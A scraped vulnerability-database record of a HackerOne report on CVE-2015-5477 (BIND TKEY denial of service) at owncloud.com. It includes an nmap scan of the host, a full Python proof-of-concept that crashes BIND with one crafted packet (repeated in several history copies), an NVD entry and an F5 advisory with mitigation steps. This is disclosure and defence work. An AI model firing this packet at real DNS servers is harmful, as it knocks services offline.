ID H1:89097 Type hackerone Reporter 1n3 Modified 2015-09-16T08:25:57
Description
owncloud.com appears to be vulnerable to CVE-2015-5477 based on the running version of BIND. This allows attackers to launch Denial of Service attacks against owncloud.com which would result in the owncloud server to stop responding and even reboot. It is recommended to upgrade to the latest version of ISC Bind.
NMap Scan Results:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT
Warning: 50.30.33.235 giving up on port because retransmission cap hit (6).
Nmap scan report for owncloud.com (50.30.33.235)
Host is up (0.041s latency).
rDNS record for 50.30.33.235: www.owncloud.com
Not shown: 993 closed ports, 3 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8 (protocol 2.0)
| ssh-hostkey:
| 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA)
| 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA)
| 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA)
53/tcp open domain
| dns-nsid:
| bind.version: 9.9.4-rpz2.13269.14-P2
{"id": "H1:89097", "hash": "5ae7a37643a1be2531f7c6a13061b21f", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "ownCloud: owncloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)", "description": "owncloud.com appears to be vulnerable to CVE-2015-5477 based on the running version of BIND. This allows attackers to launch Denial of Service attacks against owncloud.com which would result in the owncloud server to stop responding and even reboot. It is recommended to upgrade to the latest version of ISC Bind. \r\n\r\nNMap Scan Results:\r\nStarting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT\r\nWarning: 50.30.33.235 giving up on port because retransmission cap hit (6).\r\nNmap scan report for owncloud.com (50.30.33.235)\r\nHost is up (0.041s latency).\r\nrDNS record for 50.30.33.235: www.owncloud.com\r\nNot shown: 993 closed ports, 3 filtered ports\r\nPORT STATE SERVICE VERSION\r\n22/tcp open ssh OpenSSH 5.8 (protocol 2.0)\r\n| ssh-hostkey: \r\n| 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA)\r\n| 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA)\r\n|_ 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA)\r\n53/tcp open domain\r\n| dns-nsid: \r\n|_ bind.version: 9.9.4-rpz2.13269.14-P2\r\n\r\n\r\nExploit PoC:\r\n# Exploit Title: PoC for BIND9 TKEY DoS\r\n# Exploit Author: elceef\r\n# Software Link: https://github.com/elceef/tkeypoc/\r\n# Version: ISC BIND 9\r\n# Tested on: multiple\r\n# CVE : CVE-2015-5477\r\n \r\n#!/usr/bin/env python\r\n \r\nimport socket\r\nimport sys\r\n \r\nprint('CVE-2015-5477 BIND9 TKEY PoC')\r\n \r\nif len(sys.argv) < 2:\r\n print('Usage: ' + sys.argv[0] + ' [target]')\r\n sys.exit(1)\r\n \r\nprint('Sending packet to ' + sys.argv[1] + ' ...')\r\n \r\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(payload, (sys.argv[1], 53))\r\n \r\nprint('Done.')\r\n\r\n\r\nCVE Details:\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477", "published": "2015-09-15T20:11:07", "modified": "2015-09-16T08:25:57", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/89097", "reporter": "1n3", "references": [], "cvelist": ["CVE-2015-5477"], "lastseen": "2018-04-19T17:34:09", "history": [{"bulletin": {"id": "H1:89097", "hash": "2b5b9629253d59d261d4ea49f3761bed584926453750d71a0a40a12550e6cf03", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "ownCloud: owncloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)", "description": "owncloud.com appears to be vulnerable to CVE-2015-5477 based on the running version of BIND. This allows attackers to launch Denial of Service attacks against owncloud.com which would result in the owncloud server to stop responding and even reboot. It is recommended to upgrade to the latest version of ISC Bind. \r\n\r\nNMap Scan Results:\r\nStarting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT\r\nWarning: 50.30.33.235 giving up on port because retransmission cap hit (6).\r\nNmap scan report for owncloud.com (50.30.33.235)\r\nHost is up (0.041s latency).\r\nrDNS record for 50.30.33.235: www.owncloud.com\r\nNot shown: 993 closed ports, 3 filtered ports\r\nPORT STATE SERVICE VERSION\r\n22/tcp open ssh OpenSSH 5.8 (protocol 2.0)\r\n| ssh-hostkey: \r\n| 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA)\r\n| 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA)\r\n|_ 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA)\r\n53/tcp open domain\r\n| dns-nsid: \r\n|_ bind.version: 9.9.4-rpz2.13269.14-P2\r\n\r\n\r\nExploit PoC:\r\n# Exploit Title: PoC for BIND9 TKEY DoS\r\n# Exploit Author: elceef\r\n# Software Link: https://github.com/elceef/tkeypoc/\r\n# Version: ISC BIND 9\r\n# Tested on: multiple\r\n# CVE : CVE-2015-5477\r\n \r\n#!/usr/bin/env python\r\n \r\nimport socket\r\nimport sys\r\n \r\nprint('CVE-2015-5477 BIND9 TKEY PoC')\r\n \r\nif len(sys.argv) < 2:\r\n print('Usage: ' + sys.argv[0] + ' [target]')\r\n sys.exit(1)\r\n \r\nprint('Sending packet to ' + sys.argv[1] + ' ...')\r\n \r\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(payload, (sys.argv[1], 53))\r\n \r\nprint('Done.')\r\n\r\n\r\nCVE Details:\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477", "published": "2015-09-15T20:11:07", "modified": "1970-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/89097", "reporter": "1n3", "references": [], "cvelist": ["CVE-2015-5477"], "lastseen": "2017-08-22T11:09:39", "history": [], "viewCount": 4, "enchantments": {}, "objectVersion": "1.4", "bounty": 0.0, "bountyState": "resolved", "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/production/000/003/059/ef3f773944541857909a6662470c5452b3f94d88_small.png?1438786688", "medium": "https://profile-photos.hackerone-user-content.com/production/000/003/059/6af0ec24c370d0d2250fdf2ac3e937f4aab2692d_medium.png?1438786688"}, "url": "https://hackerone.com/owncloud", "handle": "owncloud"}, "h1reporter": {"hacker_mediation": false, "username": "1n3", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/production/000/011/447/16bef3952624c3f2ded0aeb39a02791740971194_small.jpg?1420058787"}, "url": "/1n3", "disabled": false}}, "lastseen": "2017-08-22T11:09:39", "edition": 1, "differentElements": ["h1reporter"]}, {"bulletin": {"id": "H1:89097", "hash": "653486d5d5b36a10b95c6b5a3c1097cf88ef8492e86515ef709f09c4e7d7c37d", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "ownCloud: owncloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)", "description": "owncloud.com appears to be vulnerable to CVE-2015-5477 based on the running version of BIND. This allows attackers to launch Denial of Service attacks against owncloud.com which would result in the owncloud server to stop responding and even reboot. It is recommended to upgrade to the latest version of ISC Bind. \r\n\r\nNMap Scan Results:\r\nStarting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT\r\nWarning: 50.30.33.235 giving up on port because retransmission cap hit (6).\r\nNmap scan report for owncloud.com (50.30.33.235)\r\nHost is up (0.041s latency).\r\nrDNS record for 50.30.33.235: www.owncloud.com\r\nNot shown: 993 closed ports, 3 filtered ports\r\nPORT STATE SERVICE VERSION\r\n22/tcp open ssh OpenSSH 5.8 (protocol 2.0)\r\n| ssh-hostkey: \r\n| 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA)\r\n| 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA)\r\n|_ 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA)\r\n53/tcp open domain\r\n| dns-nsid: \r\n|_ bind.version: 9.9.4-rpz2.13269.14-P2\r\n\r\n\r\nExploit PoC:\r\n# Exploit Title: PoC for BIND9 TKEY DoS\r\n# Exploit Author: elceef\r\n# Software Link: https://github.com/elceef/tkeypoc/\r\n# Version: ISC BIND 9\r\n# Tested on: multiple\r\n# CVE : CVE-2015-5477\r\n \r\n#!/usr/bin/env python\r\n \r\nimport socket\r\nimport sys\r\n \r\nprint('CVE-2015-5477 BIND9 TKEY PoC')\r\n \r\nif len(sys.argv) < 2:\r\n print('Usage: ' + sys.argv[0] + ' [target]')\r\n sys.exit(1)\r\n \r\nprint('Sending packet to ' + sys.argv[1] + ' ...')\r\n \r\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(payload, (sys.argv[1], 53))\r\n \r\nprint('Done.')\r\n\r\n\r\nCVE Details:\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477", "published": "2015-09-15T20:11:07", "modified": "1970-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/89097", "reporter": "1n3", "references": [], "cvelist": ["CVE-2015-5477"], "lastseen": "2017-08-28T23:19:23", "history": [], "viewCount": 4, "enchantments": {}, "objectVersion": "1.4", "bounty": 0.0, "bountyState": "resolved", "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/production/000/003/059/ef3f773944541857909a6662470c5452b3f94d88_small.png?1438786688", "medium": "https://profile-photos.hackerone-user-content.com/production/000/003/059/6af0ec24c370d0d2250fdf2ac3e937f4aab2692d_medium.png?1438786688"}, "url": "https://hackerone.com/owncloud", "handle": "owncloud"}, "h1reporter": {"hacker_mediation": false, "username": "1n3", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/production/000/011/447/16bef3952624c3f2ded0aeb39a02791740971194_small.jpg?1420058787"}, "disabled": false, "url": "/1n3", "is_me?": false}}, "lastseen": "2017-08-28T23:19:23", "edition": 2, "differentElements": ["modified"]}, {"bulletin": {"id": "H1:89097", "hash": "f0288a37e4f7558d7e44e34a77c8d9675562acc44086c593d2d962a963af9e40", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "ownCloud: owncloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)", "description": "owncloud.com appears to be vulnerable to CVE-2015-5477 based on the running version of BIND. This allows attackers to launch Denial of Service attacks against owncloud.com which would result in the owncloud server to stop responding and even reboot. It is recommended to upgrade to the latest version of ISC Bind. \r\n\r\nNMap Scan Results:\r\nStarting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT\r\nWarning: 50.30.33.235 giving up on port because retransmission cap hit (6).\r\nNmap scan report for owncloud.com (50.30.33.235)\r\nHost is up (0.041s latency).\r\nrDNS record for 50.30.33.235: www.owncloud.com\r\nNot shown: 993 closed ports, 3 filtered ports\r\nPORT STATE SERVICE VERSION\r\n22/tcp open ssh OpenSSH 5.8 (protocol 2.0)\r\n| ssh-hostkey: \r\n| 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA)\r\n| 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA)\r\n|_ 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA)\r\n53/tcp open domain\r\n| dns-nsid: \r\n|_ bind.version: 9.9.4-rpz2.13269.14-P2\r\n\r\n\r\nExploit PoC:\r\n# Exploit Title: PoC for BIND9 TKEY DoS\r\n# Exploit Author: elceef\r\n# Software Link: https://github.com/elceef/tkeypoc/\r\n# Version: ISC BIND 9\r\n# Tested on: multiple\r\n# CVE : CVE-2015-5477\r\n \r\n#!/usr/bin/env python\r\n \r\nimport socket\r\nimport sys\r\n \r\nprint('CVE-2015-5477 BIND9 TKEY PoC')\r\n \r\nif len(sys.argv) < 2:\r\n print('Usage: ' + sys.argv[0] + ' [target]')\r\n sys.exit(1)\r\n \r\nprint('Sending packet to ' + sys.argv[1] + ' ...')\r\n \r\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(payload, (sys.argv[1], 53))\r\n \r\nprint('Done.')\r\n\r\n\r\nCVE Details:\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477", "published": "2015-09-15T20:11:07", "modified": "2015-09-16T08:25:57", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/89097", "reporter": "1n3", "references": [], "cvelist": ["CVE-2015-5477"], "lastseen": "2018-02-07T16:57:58", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 4.9, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:N/", "modified": "2018-02-07T16:57:58"}}, "objectVersion": "1.4", "bounty": 0.0, "bountyState": "resolved", "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/production/000/003/059/ef3f773944541857909a6662470c5452b3f94d88_small.png?1438786688", "medium": "https://profile-photos.hackerone-user-content.com/production/000/003/059/6af0ec24c370d0d2250fdf2ac3e937f4aab2692d_medium.png?1438786688"}, "url": "https://hackerone.com/owncloud", "handle": "owncloud"}, "h1reporter": {"hacker_mediation": false, "username": "1n3", "hackerone_triager": false, "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/production/000/011/447/16bef3952624c3f2ded0aeb39a02791740971194_small.jpg?1420058787"}, "disabled": false, "url": "/1n3", "is_me?": false}}, "lastseen": "2018-02-07T16:57:58", "edition": 4, "differentElements": ["h1team", "h1reporter"]}, {"bulletin": {"id": "H1:89097", "hash": "8db7c2718ce0490674b40945a7472f3c9d77bb653b43609d1008d693cc945573", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "ownCloud: owncloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)", "description": "owncloud.com appears to be vulnerable to CVE-2015-5477 based on the running version of BIND. This allows attackers to launch Denial of Service attacks against owncloud.com which would result in the owncloud server to stop responding and even reboot. It is recommended to upgrade to the latest version of ISC Bind. \r\n\r\nNMap Scan Results:\r\nStarting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT\r\nWarning: 50.30.33.235 giving up on port because retransmission cap hit (6).\r\nNmap scan report for owncloud.com (50.30.33.235)\r\nHost is up (0.041s latency).\r\nrDNS record for 50.30.33.235: www.owncloud.com\r\nNot shown: 993 closed ports, 3 filtered ports\r\nPORT STATE SERVICE VERSION\r\n22/tcp open ssh OpenSSH 5.8 (protocol 2.0)\r\n| ssh-hostkey: \r\n| 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA)\r\n| 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA)\r\n|_ 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA)\r\n53/tcp open domain\r\n| dns-nsid: \r\n|_ bind.version: 9.9.4-rpz2.13269.14-P2\r\n\r\n\r\nExploit PoC:\r\n# Exploit Title: PoC for BIND9 TKEY DoS\r\n# Exploit Author: elceef\r\n# Software Link: https://github.com/elceef/tkeypoc/\r\n# Version: ISC BIND 9\r\n# Tested on: multiple\r\n# CVE : CVE-2015-5477\r\n \r\n#!/usr/bin/env python\r\n \r\nimport socket\r\nimport sys\r\n \r\nprint('CVE-2015-5477 BIND9 TKEY PoC')\r\n \r\nif len(sys.argv) < 2:\r\n print('Usage: ' + sys.argv[0] + ' [target]')\r\n sys.exit(1)\r\n \r\nprint('Sending packet to ' + sys.argv[1] + ' ...')\r\n \r\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(payload, (sys.argv[1], 53))\r\n \r\nprint('Done.')\r\n\r\n\r\nCVE Details:\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477", "published": "2015-09-15T20:11:07", "modified": "2015-09-16T08:25:57", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/89097", "reporter": "1n3", "references": [], "cvelist": ["CVE-2015-5477"], "lastseen": "2017-08-29T13:11:23", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 4.9, "modified": "2017-08-29T13:11:23"}}, "objectVersion": "1.4", "bounty": 0.0, "bountyState": "resolved", "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/production/000/003/059/ef3f773944541857909a6662470c5452b3f94d88_small.png?1438786688", "medium": "https://profile-photos.hackerone-user-content.com/production/000/003/059/6af0ec24c370d0d2250fdf2ac3e937f4aab2692d_medium.png?1438786688"}, "url": "https://hackerone.com/owncloud", "handle": "owncloud"}, "h1reporter": {"hacker_mediation": false, "username": "1n3", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/production/000/011/447/16bef3952624c3f2ded0aeb39a02791740971194_small.jpg?1420058787"}, "disabled": false, "url": "/1n3", "is_me?": false}}, "lastseen": "2017-08-29T13:11:23", "edition": 3, "differentElements": ["h1reporter"]}], "viewCount": 7, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2018-04-19T17:34:09", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-5477"]}, {"type": "f5", "idList": ["F5:K16909", "SOL16909"]}, {"type": "openvas", "idList": ["OPENVAS:703319", "OPENVAS:1361412562310105366", "OPENVAS:1361412562310869832", "OPENVAS:1361412562310869831", "OPENVAS:1361412562310123049", "OPENVAS:1361412562310851081", "OPENVAS:1361412562310882234", "OPENVAS:1361412562310871420", "OPENVAS:1361412562310871419", "OPENVAS:1361412562310882233"]}, {"type": "hackerone", "idList": ["H1:237860", "H1:217381"]}, {"type": "nessus", "idList": ["SL_20150729_BIND_ON_SL6_X.NASL", "CENTOS_RHSA-2015-1514.NASL", "REDHAT-RHSA-2015-1514.NASL", "SUSE_SU-2015-1316-1.NASL", "ALA_ALAS-2015-573.NASL", "MACOSX_SERVER_4_1_5.NASL", "DEBIAN_DSA-3319.NASL", "CENTOS_RHSA-2015-1513.NASL", "ORACLELINUX_ELSA-2015-1514.NASL", "AIX_IV75690.NASL"]}, {"type": "centos", "idList": ["CESA-2015:1513", "CESA-2015:1515", "CESA-2015:1514"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14619", "SECURITYVULNS:DOC:32383", "SECURITYVULNS:DOC:32391"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/DNS/BIND_TKEY"]}, {"type": "exploitdb", "idList": ["EDB-ID:37723", "EDB-ID:37721"]}, {"type": "zdt", "idList": ["1337DAY-ID-23970", "1337DAY-ID-23948", "1337DAY-ID-23960"]}, {"type": "suse", "idList": ["SUSE-SU-2015:1304-1", "SUSE-SU-2015:1316-1", "SUSE-SU-2015:1322-1", "SUSE-SU-2015:1305-1", "OPENSUSE-SU-2015:1335-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-285-1:3629A", "DEBIAN:DSA-3319-1:36EAC"]}, {"type": "archlinux", "idList": ["ASA-201507-22"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:46DEBFAC850194C04C54F93E0DFF5F4F", "EXPLOITPACK:BE4F638B632EA0754155A27ECC4B3D3F"]}, {"type": "threatpost", "idList": ["THREATPOST:345F6C411E78E96A9B0A921D21729C65"]}, {"type": "myhack58", "idList": ["MYHACK58:62201565275"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132926"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-1513", "ELSA-2015-1706", "ELSA-2015-1514", "ELSA-2015-1515"]}, {"type": "slackware", "idList": ["SSA-2015-209-01"]}, {"type": "freebsd", "idList": ["731CDEAA-3564-11E5-9970-14DAE9D210B8"]}, {"type": "redhat", "idList": ["RHSA-2015:1514", "RHSA-2016:0079", "RHSA-2015:1515", "RHSA-2015:1513"]}, {"type": "amazon", "idList": ["ALAS-2015-573"]}, {"type": "aix", "idList": ["BIND9_ADVISORY8.ASC"]}, {"type": "ubuntu", "idList": ["USN-2693-1"]}], "modified": "2018-04-19T17:34:09", "rev": 2}, "vulnersScore": 6.3}, "objectVersion": "1.4", "bounty": 0.0, "bountyState": "resolved", "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/003/059/ef3f773944541857909a6662470c5452b3f94d88_small.png?1438786688", "medium": "https://profile-photos.hackerone-user-content.com/000/003/059/6af0ec24c370d0d2250fdf2ac3e937f4aab2692d_medium.png?1438786688"}, "url": "https://hackerone.com/owncloud", "handle": "owncloud"}, "h1reporter": {"hacker_mediation": false, "username": "1n3", "hackerone_triager": false, "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/011/447/16bef3952624c3f2ded0aeb39a02791740971194_small.jpg?1420058787"}, "disabled": false, "url": "/1n3", "is_me?": false}, "_object_type": "robots.models.hackerone.HackerOneBulletin", "_object_types": ["robots.models.hackerone.HackerOneBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.", "modified": "2017-11-10T02:29:00", "id": "CVE-2015-5477", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5477", "published": "2015-07-29T14:59:00", "title": "CVE-2015-5477", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:31", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 534630 to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H535739 on the **Diagnostics **> **Identified **> **High **screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.6.0**1** \n11.0.0 - 11.5.3**1** \n10.1.0 - 10.2.4| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \n11.6.0**2 ** \n11.2.0 - 11.5.3**2 **| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n11.0.0 - 11.1.0 \n10.1.0 - 10.2.4| Severe| BIND \nBIG-IP AAM| 11.6.0**1** \n11.4.0 - 11.5.3**1**| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9| Severe| BIND \nBIG-IP AFM| 11.6.0**1** \n11.3.0 - 11.5.3**1**| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9| Severe| BIND \nBIG-IP Analytics| 11.6.0**1** \n11.0.0 - 11.5.3**1**| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15| Severe| BIND \nBIG-IP APM| 11.6.0**1** \n11.0.0 - 11.5.3**1** \n10.1.0 - 10.2.4| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP ASM| 11.6.0**1** \n11.0.0 - 11.5.3**1** \n10.1.0 - 10.2.4| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0**1** \n10.1.0 - 10.2.4| 11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP GTM| 11.6.0**1,2,3** \n11.0.0 - 11.5.3**1,2,3** \n10.1.0 - 10.2.4| 11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP Link Controller| 11.6.0**1,2,3** \n11.0.0 - 11.5.3**1,2,3** \n10.1.0 - 10.2.4| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP PEM| 11.6.0**1** \n11.3.0 - 11.5.3**1**| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9| Severe| BIND \nBIG-IP PSM| 11.0.0 - 11.4.1**1** \n10.1.0 - 10.2.4| 11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0**1** \n10.1.0 - 10.2.4| 11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP WOM| 11.0.0 - 11.3.0**1** \n10.1.0 - 10.2.4| 11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.1.14| None| Low| BIND \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.04| None| Low| BIND \nBIG-IQ Device| 4.2.0 - 4.5.04| None| Low| BIND \nBIG-IQ Security| 4.0.0 - 4.5.04| None| Low| BIND \nBIG-IQ ADC| 4.5.04| None| Low| BIND \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n**1**These versions are vulnerable if a self IP address or management IP address is configured to allow inbound connections on port 53. \n\n**2**These versions are vulnerable if a DNS profile is configured with the** **'Use BIND Server on BIG-IP**' **option (enabled by default). \n\n**3**These versions are vulnerable if configured with a pool that uses the Return to DNS load balancing method or when the pool's** **Alternate and Fallback load balancing methods are set to **None** and all pools associated with the wide IP are unavailable.\n\n**4**Although BIG-IQ/Enterprise Manager contains the vulnerable code, BIG-IQ/Enterprise Manager systems do not use the vulnerable code in a way that exposes the vulnerability.\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nBIG-IP\n\nTo mitigate this vulnerability, you can use the DNS Caching and DNS Express features instead of BIND. In addition, to mitigate the issue on the management IP address, restrict access to that IP address to trusted hosts only.\n\nTo mitigate the issue on the self IP address, do not allow port 53 on the self IP address. If your self IP address is configured to use the default allow, you can remove that port from the list of the default allowed services.\n\n**_Ensuring that TCP/UDP port 53 is not allowed as a default service (allow-service default)_**\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. List the default services allowed by the **allow-service default **setting, by typing the following command: \n\nlist net self-allow\n\nOutput appears similar to the following example:\n\nnet self-allow { \ndefaults { \nospf:any \ntcp:domain \ntcp:f5-iquery \ntcp:https \ntcp:snmp \ntcp:ssh \nudp:520 \nudp:cap \nudp:domain \nudp:f5-iquery \nudp:snmp \n} \n}\n\n 3. If TCP port 53 (tcp:53 or tcp:domain) or UDP port 53 (udp:53 or udp:domain) are listed as a default allowed port, you should delete the entries by typing the following command: \n\nmodify net self-allow defaults delete { tcp:domain udp:domain }\n\n 4. Save 